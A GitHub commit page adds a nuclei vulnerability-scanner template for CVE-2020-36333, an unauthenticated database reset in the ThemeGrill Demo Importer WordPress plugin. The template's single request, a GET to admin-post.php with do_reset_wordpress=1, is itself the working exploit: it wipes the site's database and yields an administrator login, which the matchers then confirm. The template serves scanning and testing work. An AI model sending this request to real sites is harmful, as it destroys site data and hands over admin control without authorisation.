Skip to content

Commit 72e6fa7

Browse files
Merge pull request #12447 from projectdiscovery/CVE-2020-36333
Create CVE-2020-36333.yaml
2 parents 84c0311 + db17dcf commit 72e6fa7

1 file changed

Lines changed: 37 additions & 0 deletions

File tree

http/cves/2020/CVE-2020-36333.yaml

Lines changed: 37 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,37 @@
1+
id: CVE-2020-36333
2+
3+
info:
4+
name: ThemeGrill Demo Importer < 1.6.2 - Database Reset
5+
author: iamnoooob,pdresearch
6+
severity: critical
7+
description: |
8+
ThemeGrill Demo Importer before 1.6.2 does not require authentication for wiping the database due to a reset_wizard_actions hook. In versions 1.3.4 and above and versions 1.6.1 and below, there is a vulnerability that allows any unauthenticated user to wipe the entire database to its default state after which they are automatically logged in as an administrator.
9+
reference:
10+
- https://www.openwall.com/lists/oss-security/2020/02/19/1
11+
- https://nvd.nist.gov/vuln/detail/CVE-2020-36333
12+
classification:
13+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
14+
cvss-score: 9.1
15+
cve-id: CVE-2020-36333
16+
cwe-id: CWE-285
17+
metadata:
18+
verified: true
19+
max-request: 1
20+
product: themegrill-demo-importer
21+
vendor: themegrill
22+
fofa-query: body="/plugins/themegrill-demo-importer"
23+
tags: cve,cve2020,wp,wordpress,wp-plugin,themegrill,kev
24+
25+
http:
26+
- raw:
27+
- |+
28+
GET /wp-admin/admin-post.php?do_reset_wordpress=1 HTTP/1.1
29+
Host: {{Hostname}}
30+
31+
matchers:
32+
- type: dsl
33+
dsl:
34+
- 'len(body)==0'
35+
- 'status_code == 302'
36+
- 'contains_all(header, "wordpress_logged_in_", "reset=true")'
37+
condition: and

0 commit comments

Comments
 (0)